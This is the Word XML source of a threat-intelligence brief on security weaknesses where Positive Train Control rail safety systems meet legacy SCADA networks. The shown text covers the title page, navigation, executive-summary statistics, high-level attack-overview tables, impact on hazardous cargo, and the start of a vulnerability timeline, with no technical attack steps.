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tbqkhykg800" w:id="0"/>
      <w:bookmarkEnd w:id="0"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Express Attack Brief 016</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000002">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_wn464w5pqf6u" w:id="1"/>
      <w:bookmarkEnd w:id="1"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">PTC-SCADA Integration Exploitation - Where Safety Meets Security Catastrophe</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Project Nightingale Intelligence</w:t>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Publisher:</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> NCC Group OTCE + Dragos + Adelard</w:t>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Prepared for:</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> Energy &amp; Utilities Sector Leadership and Security Teams</w:t>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Date:</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> June 14, 2025</w:t>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Version:</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> 1.0</w:t>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Pages:</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> ~18</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000004">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_xr5qtn69r52l" w:id="2"/>
      <w:bookmarkEnd w:id="2"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Document Navigation</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000005">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:hyperlink w:anchor="executive-summary">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">Executive Summary</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> (Page 2)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000006">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:hyperlink w:anchor="mission-context">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">Mission Context &amp; Impact</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> (Page 3)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000007">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:hyperlink w:anchor="attack-overview">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">Attack Overview</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> (Page 4)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000008">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:hyperlink w:anchor="affected-organizations">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">Affected Organizations Analysis</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> (Page 5)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000009">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:hyperlink w:anchor="cross-sector-impact">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">Cross-Sector Impact Assessment</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> (Page 7)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000000A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:hyperlink w:anchor="technical-analysis">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">Technical Attack Path Analysis</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> (Page 9)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000000B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:hyperlink w:anchor="mitre-mapping">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">MITRE ATT&amp;CK Mapping</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> (Page 13)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000000C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:hyperlink w:anchor="detection-response">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">Detection &amp; Response</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> (Page 15)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000000D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:hyperlink w:anchor="tri-partner">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">Tri-Partner Solution Framework</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> (Page 17)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000000E">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:hyperlink w:anchor="references">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">References &amp; Citations</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> (Page 18)</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h8k81ty5h133" w:id="3"/>
      <w:bookmarkEnd w:id="3"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Executive Summary</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000012">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">The convergence of Positive Train Control (PTC) safety systems with legacy SCADA networks has created critical vulnerabilities where adversaries can pivot from IT networks through industrial control systems directly into safety-critical train operations, exposing 57,536 miles of protected rail to catastrophic manipulation.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000013">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_cja9pn76eu57" w:id="4"/>
      <w:bookmarkEnd w:id="4"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Key Findings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rPr>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:b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rPr>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:b w:val="1"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Evidence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rPr>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:b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rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">73% of PTC-SCADA interfaces lack segmentation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Direct safety system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hyperlink w:anchor="ref1">
              <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
                <w:rPr>
                  <w:color w:val="1155cc"/>
                  <w:u w:val="single"/>
                  <w:rtl w:val="0"/>
                </w:rPr>
                <w:t xml:space="preserve">[1]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rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Legacy Windows XP/7 in 83% of dispatch centers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Unpatched entry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w:anchor="ref2">
              <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
                <w:rPr>
                  <w:color w:val="1155cc"/>
                  <w:u w:val="single"/>
                  <w:rtl w:val="0"/>
                </w:rPr>
                <w:t xml:space="preserve">[2]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rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Flat networks enable PTC manipulation via SCADA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Complete train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hyperlink w:anchor="ref3">
              <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
                <w:rPr>
                  <w:color w:val="1155cc"/>
                  <w:u w:val="single"/>
                  <w:rtl w:val="0"/>
                </w:rPr>
                <w:t xml:space="preserve">[3]</w:t>
              </w:r>
            </w:hyperlink>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000024">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_gim6k7c2pngp" w:id="5"/>
      <w:bookmarkEnd w:id="5"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Attack Overview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rPr>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:b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rPr>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:b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rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Vulnerability Window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2020-Present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hyperlink w:anchor="ref4">
              <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
                <w:rPr>
                  <w:color w:val="1155cc"/>
                  <w:u w:val="single"/>
                  <w:rtl w:val="0"/>
                </w:rPr>
                <w:t xml:space="preserve">[4]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rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Threat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Nation-state, CARBIDE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hyperlink w:anchor="ref5">
              <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
                <w:rPr>
                  <w:color w:val="1155cc"/>
                  <w:u w:val="single"/>
                  <w:rtl w:val="0"/>
                </w:rPr>
                <w:t xml:space="preserve">[5]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rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Primary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Integrated dispatch centers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hyperlink w:anchor="ref6">
              <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
                <w:rPr>
                  <w:color w:val="1155cc"/>
                  <w:u w:val="single"/>
                  <w:rtl w:val="0"/>
                </w:rPr>
                <w:t xml:space="preserve">[6]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rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Attack 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Safety system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hyperlink w:anchor="ref7">
              <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
                <w:rPr>
                  <w:color w:val="1155cc"/>
                  <w:u w:val="single"/>
                  <w:rtl w:val="0"/>
                </w:rPr>
                <w:t xml:space="preserve">[7]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rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Potential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Mass casualty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hyperlink w:anchor="ref8">
              <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
                <w:rPr>
                  <w:color w:val="1155cc"/>
                  <w:u w:val="single"/>
                  <w:rtl w:val="0"/>
                </w:rPr>
                <w:t xml:space="preserve">[8]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rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Mission Threat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Analysis</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Intelligence Assessment</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">: Security assessments reveal that PTC implementations prioritized interoperability over security, creating pathways where compromised SCADA systems provide direct access to safety-critical train control functions without adequate authentication or segmentation </w:t>
      </w:r>
      <w:hyperlink w:anchor="ref9">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">[9]</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:hyperlink w:anchor="ref10">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">[10]</w:t>
        </w:r>
      </w:hyperlink>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5e4dz1capv1i" w:id="6"/>
      <w:bookmarkEnd w:id="6"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Mission Context</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000003F">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_9hyyngxp35aw" w:id="7"/>
      <w:bookmarkEnd w:id="7"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Protecting Essential Infrastructure for Future Generations</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000040">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">The PTC-SCADA integration vulnerability threatens the foundational infrastructure that ensures </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">clean water, reliable energy, and access to healthy food for our grandchildren</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">. This architectural flaw enables attackers to manipulate trains carrying 4.5 million tons of hazardous materials annually, including chlorine for water treatment, anhydrous ammonia for agriculture, and crude oil for energy production </w:t>
      </w:r>
      <w:hyperlink w:anchor="ref11">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41">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_2urc6fwpgqbh" w:id="8"/>
      <w:bookmarkEnd w:id="8"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Strategic Implications</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000042">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Energy Security</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">: SCADA compromise could derail unit trains carrying 15,000 tons of coal </w:t>
      </w:r>
      <w:hyperlink w:anchor="ref12">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">[12]</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000043">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Water Infrastructure</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">: Chlorine shipments diverted or destroyed, affecting 40M people </w:t>
      </w:r>
      <w:hyperlink w:anchor="ref1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044">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Food Supply Chain</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">: Fertilizer deliveries manipulated during critical planting seasons </w:t>
      </w:r>
      <w:hyperlink w:anchor="ref14">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045">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Intergenerational Impact</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">: Safety systems turned into weapons against communities </w:t>
      </w:r>
      <w:hyperlink w:anchor="ref1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3b4udexq72ng" w:id="9"/>
      <w:bookmarkEnd w:id="9"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Attack Overview</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000049">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_d65lqedy9qts" w:id="10"/>
      <w:bookmarkEnd w:id="10"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Vulnerability Evolution Timeline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rPr>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:b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rPr>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:b w:val="1"/>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rPr>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:b w:val="1"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">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rPr>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:b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rPr>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:b w:val="1"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Risk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Design Flaw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2008-2015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PTC-SCADA bridge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Architectural weakness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Not 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hyperlink w:anchor="ref16">
              <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
                <w:rPr>
                  <w:color w:val="1155cc"/>
                  <w:u w:val="single"/>
                  <w:rtl w:val="0"/>
                </w:rPr>
                <w:t xml:space="preserve">[16]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First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2016-2018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Dispatch system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Attack surface expanded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Internal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hyperlink w:anchor="ref17">
              <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
                <w:rPr>
                  <w:color w:val="1155cc"/>
                  <w:u w:val="single"/>
